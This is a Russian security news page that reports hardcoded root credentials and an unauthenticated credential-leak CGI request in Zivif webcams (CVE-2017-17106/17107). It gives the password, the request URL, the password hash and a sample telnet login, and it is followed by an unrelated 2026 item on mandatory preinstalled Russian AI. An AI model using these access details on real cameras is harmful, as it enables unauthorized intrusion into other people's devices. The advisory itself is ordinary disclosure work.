В веб-камерах Zivif обнаружен жестко закодированный рутовый пароль

Олег Иванов 09 Января 2018 - 10:44

...

В веб-камерах Zivif обнаружен жестко закодированный рутовый пароль

Веб-камеры Zivif PR115-204-P-RS V2.3.4.2103 содержат жестко закодированный пароль cat1029, использующийся для пользователя root. Настройка операционной системы SONIX делает этот пароль неизменяемым, соответственно, его можно использовать для доступа к устройству через сеанс TELNET.

Как утверждают специалисты, камерам Zivif недостает контроля доступа, в результате функции CGI можно вызывать напрямую, обходя проверки подлинности.

Проблема получила идентификатор CVE-2017-17106, заключается она в том, что камера на запрос http://<Адрес Камеры>/web/cgi-bin/hi3510/param.cgi?cmd=getuser отвечает следующим образом:

var name0="admin"; var password0="admin"; var authLevel0="255"; var
name1="guest"; var password1="guest"; var authLevel1="3"; var
name2="admin2"; var password2="admin"; var authLevel2="3"; var name3="";
var password3=""; var authLevel3="3"; var name4=""; var password4="";
var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3";
var name6=""; var password6=""; var authLevel6="3"; var name7=""; var
password7=""; var authLevel7="3"; var name8=""; var password8=""; var
authLevel8="0"; var name9=""; var password9=""; var authLevel9="0

Учетные данные возвращаются в текстовом виде.

Также эксперты отметили в файле /etc/passwd наличие жестко закодированной записи (CVE-2017-17107):

root:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh

Зашифрованный пароль - cat1029.

(none) login: root
Password:
Login incorrect
(none) login: root
Password:
Welcome to SONIX.
\u@\h:\W$

Из-за того, как структурирована файловая система, изменение этого пароля составит нетривиальную задачу.

Следующая главная новость »

SOC без иллюзий: от выбора технологий к реальной защите - обсудим в эфире AM Live! Регистрируйтесь »

Екатерина Быстрова 11 Февраля 2026 - 12:41

Соответствие законодательству РФ Общее

В России могут обязать предустанавливать отечественный ИИ на смартфоны

В России рассматривают возможность обязать производителей предустанавливать отечественные ИИ-сервисы на смартфоны и другую электронику. Эту норму могут включить в готовящийся закон о регулировании искусственного интеллекта, сообщают «Известия» со ссылкой на материалы правительства.

По данным издания, Минцифры должно представить документ на согласование в правительство к концу февраля. Детали инициативы пока прорабатываются, но идея в целом продолжает логику уже действующего закона о предустановке российского ПО, который применяется с 2021 года.

В аппарате вице-премьера Дмитрия Григоренко подчеркнули, что предустановка отечественных сервисов — один из способов укрепления технологической независимости. По их словам, у России уже есть собственные маркетплейсы, браузеры, антивирусы и сервисы госуслуг, а теперь — и большие языковые модели. Пользователи должны иметь возможность пользоваться такими решениями по умолчанию.

Сейчас ИИ в смартфонах постепенно становится стандартом. По оценке Mobile Research Group, в 2025 году он был предустановлен примерно на 7% продаваемых в России устройств, а к концу 2026-го доля может вырасти до 10%. Наиболее активно ИИ-функции развивают Samsung и ряд китайских производителей.

Участники рынка считают, что технически внедрить такую норму возможно — опыт обязательной предустановки российского софта уже есть. Однако эксперты предупреждают: отечественным разработчикам придётся конкурировать с зарубежными ИИ-продуктами, которые уже встроены в устройства и активно развиваются.

По словам специалистов, успех будет зависеть от качества решений. Если российские ИИ-сервисы предложат удобные голосовые ассистенты, продвинутую обработку фото и видео, работу офлайн или глубокую интеграцию с популярными сервисами, они смогут завоевать аудиторию. В противном случае пользователи просто удалят ненужные приложения — как это часто происходит и сейчас.

Некоторые эксперты отмечают, что россияне уже активно пользуются ИИ на смартфонах, просто не всегда это осознают — например, общаясь с чат-ботами банков или госструктур.

Будет ли предустановка обязательной и в каком именно виде — станет ясно после публикации законопроекта. Пока речь идёт о проработке механизма и сборе предложений.

SOC без иллюзий: от выбора технологий к реальной защите - обсудим в эфире AM Live! Регистрируйтесь »